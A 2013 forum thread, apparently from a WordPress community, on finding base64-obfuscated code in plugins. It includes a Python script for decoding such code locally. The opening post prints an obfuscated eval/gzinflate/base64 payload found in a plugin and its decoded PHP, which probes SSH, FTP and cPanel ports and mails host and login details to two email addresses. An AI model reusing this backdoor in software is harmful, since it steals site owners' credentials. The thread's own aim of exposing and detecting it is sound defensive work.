12-06-2013, 02:01 PM
Post: #1
A Method to Check Base64 Code
I use this method to check base64 code found in a lot of WordPress plugins and scripts. A free plugin called plugin check will analyze your installed plugins and let you know if there's any base64 code, and the location of the code. Go to the code location in the plugins editor section of your WordPress dashboard. Copy the base64 code. Go to http://www.unphp.net/ and paste the code in the decoder. Read the result. Here's the result from a plugin I downloaded on another forum. I apologize, I don't remember the plugin, but here's what I got. The base64 code was:


eval(gzinflate(base64_decode('rVPRTtswFH2PlH/woki0Uqhw+oLomJimou5hWtSUPcBQ5TouDSS+np0I2LQP2l/ia6egofQtzYPt
43POvb2+NwziAmpWSnJO4nU+X/6YL2+OFqtVtl58z1dHt7MwiFVK7XVK/T7Ffer3J6fuZBc8c3+5
NcAfQAk56rwTVCWx0FqCW0yjE3oy7jT0kIYe1vjAvSp71a/Dr9yOPrg8x2HwJ2b0PJprDTqa/Q0D
URmxR/OWc2FMNNvyCowYeQ2y3jyo90h7PdJ+D/rOwybrXaa9LtN+F1R5H3wFYx8vCoPjoX4/ZRh8
UUyKilypgjWCfJVbIDdkKTgUgmyeyTdmHtY1uyt5yeQ1uSWoGTSBBZiGnJHuXRG5MkIjUsGdBzJm
DALKroPH/2yrrhqSgW7cn8vzhY3ljrZBELlcZW9IigjPXNFewengWf2zs0bp/+X/bcM9Ci0KfJil
bZENk0XZXA8cPMLJa8BOXfSrZbJp64nSpbS9efHMdgATDrXjaMFLhbR72MkJVxt4escw7eZe8AY5
Xcmw2ibv2s1xdoIVQhvkXGqoz0jr7j5K8WguuDr2x0lpO/MTCmyXVCObX7J3T3Awkr3P+JXi0jvI
egE=')))

Here is what unphp.net decoded:


$domain = $_SERVER['HTTP_HOST'];
$p21 = 21;
$p22 = 22;
$p2082 = 2082;
$cp22 = fsockopen($domain,$p22,$errno,$errstr,10);
$cp21 = fsockopen($domain,$p21,$errno,$errstr,10);
$cp2082 = fsockopen($domain,$p2082,$errno,$errstr,10);
if(!$cp22)
{$a1="Error";}
else
{$a1="Success";fclose($cp22);}
if(!$cp21)
{$a2="Error";}
else
{$a2="Success";fclose($cp21);}
if(!$cp2082)
{$a3="Error";}
else
{$a3="Success";fclose($cp2082);}
$psn ="
-------------------------------------------------------------------------

Cpanel Update Info [ Recode by Mask_magicianZ ]

-------------------------------------------------------------------------

Host : $domain

User : $login

Pass : $pass

-------------------------------------------------------------------------

Accept Port

SSH : Port $a1

FTP : Port $a2

cPanel : Port $a3

-------------------------------------------------------------------------

. 2011 Mask_magicianz Powered by RosebanditZ

-------------------------------------------------------------------------
";
$to = "quantum.princes@yahoo.com";
$recip = "john.cpbox@yahoo.com";
$subject = "cPanel AccesS Update";
$headers = "From: update
";
mail($to,$subject,$psn,$headers);
mail($recip,$subject,$psn,$headers);



As you can see, this code was designed to take your password, user login, and your domain URL, and email it to the email above. Wow. Anyway, I'm sure you seasoned vets already know about this, but us newbies can fall prey to it. Beware, check everything.
12-06-2013, 02:25 PM
Post: #2
RE:
Seriously, you can't be butthurt by that.. C'mon, you'd also do what it takes to protect your intellectual property. Do you honestly think he'd even touch his paying customers' websites?
12-06-2013, 02:36 PM
Post: #3
RE:
Very interesting indeed. Use another method myself but ends up at same point.

Sure some will find this info useful. Thanks for sharing.
if you think everyone else stupid, might be good time to look in a mirror...
12-06-2013, 03:25 PM
Post: #4
RE:
Butthurt? Nah, just sharing.
12-07-2013, 02:26 AM
Post: #5
RE:
Talking about this plugin?
Code:
http://wordpress.org/plugins/plugin-check/
12-07-2013, 05:33 AM
Post: #6
RE:
(12-07-2013 02:26 AM)Soul Wrote:  Talking about this plugin?
Code:
http://wordpress.org/plugins/plugin-check/
yes.
12-07-2013, 09:53 PM (This post was last modified: 12-07-2013 09:55 PM by Soul.)
Post: #7
RE:
Warning message from WordPress:
Code:
This plugin hasn't been updated in over 2 years.
It may no longer be maintained or supported and may have compatibility
issues when used with more recent versions of WordPress.

Compatible up to: 3.3.2 version of WP
12-08-2013, 04:22 AM
Post: #8
RE:
Thanks for sharing, but why does the developer want their customer's ID and pass without their knowledge!! Marketplaces like ThemeForest should ban those devs.
12-09-2013, 12:56 AM
Post: #9
RE:
Other times you get fragments of code that they join all together so the full string works as decode. Just use:
TAC: http://wordpress.org/plugins/tac/
And antivirus: http://wordpress.org/plugins/antivirus/
One year old Theme Check: http://wordpress.org/plugins/theme-check/
Just check your code first before uploading to a production environment.
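The check from post #1 and the joined-fragment case from post #9 can both be done locally, without executing the code or pasting it into a third-party site. The sketch below is an added example, not code from any poster or plugin in this thread; the function names and the watch list are illustrative assumptions, and the sample input is constructed.

```python
import base64
import re
import zlib

# 'base' . '64_decode'  ->  'base64_decode' (closing quote, dot, opening quote)
FRAGMENT_JOIN = re.compile(r"""(['"])\s*\.\s*\1""")
# Quoted literal made only of base64 characters, 24 or more of them.
B64_LITERAL = re.compile(r"""(['"])([A-Za-z0-9+/=\s]{24,})\1""")
# Names worth reading closely in decoded plugin code (illustrative list).
WATCHED = ("eval(", "mail(", "fsockopen(", "curl_exec(", "$_SERVER", "base64_decode(")


def join_fragments(php_source):
    """Collapse concatenated string fragments so split names become visible."""
    return FRAGMENT_JOIN.sub("", php_source)


def decode_literals(php_source):
    """Decode base64 literals offline; nothing is ever executed."""
    results = []
    for match in B64_LITERAL.finditer(join_fragments(php_source)):
        try:
            raw = base64.b64decode("".join(match.group(2).split()), validate=True)
        except ValueError:  # binascii.Error is a ValueError: not valid base64
            continue
        try:
            raw = zlib.decompress(raw, -15)  # PHP gzinflate() is raw DEFLATE
        except zlib.error:
            pass  # plain base64 with no compression layer
        results.append(raw.decode("utf-8", errors="replace"))
    return results


def watched_calls(decoded_text):
    """Return the watched names that appear in a decoded payload."""
    return [name for name in WATCHED if name in decoded_text]


def build_sample(inner_php):
    """Constructed test input: wraps text like the snippet in post #1, split in two."""
    deflater = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(deflater.compress(inner_php.encode()) + deflater.flush()).decode()
    half = len(blob) // 2
    return "$f = 'base' . '64_decode';\neval(gzinflate($f('%s' . '%s')));" % (blob[:half], blob[half:])


if __name__ == "__main__":
    for text in decode_literals(build_sample("mail($to, 'x', $_SERVER['HTTP_HOST']);")):
        print(watched_calls(text), text)
```

Any long alphanumeric literal will be picked up, so expect some unreadable results from strings that are not actually encoded code; those can be ignored.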
12-10-2013, 06:21 PM (This post was last modified: 12-10-2013 06:21 PM by Gadzookz.)
Post: #10
RE:
(12-07-2013 09:53 PM)Soul Wrote:  Warning message from WordPress:
Code:
This plugin hasn't been updated in over 2 years.
It may no longer be maintained or supported and may have compatibility
issues when used with more recent versions of WordPress.

Compatible up to: 3.3.2 version of WP
I noticed that too, but I find it still works.

(12-08-2013 04:22 AM)GreenPeace Wrote:  Thanks for sharing, but why does the developer want their customer's ID and pass without their knowledge!! Marketplaces like ThemeForest should ban those devs.
Exactly.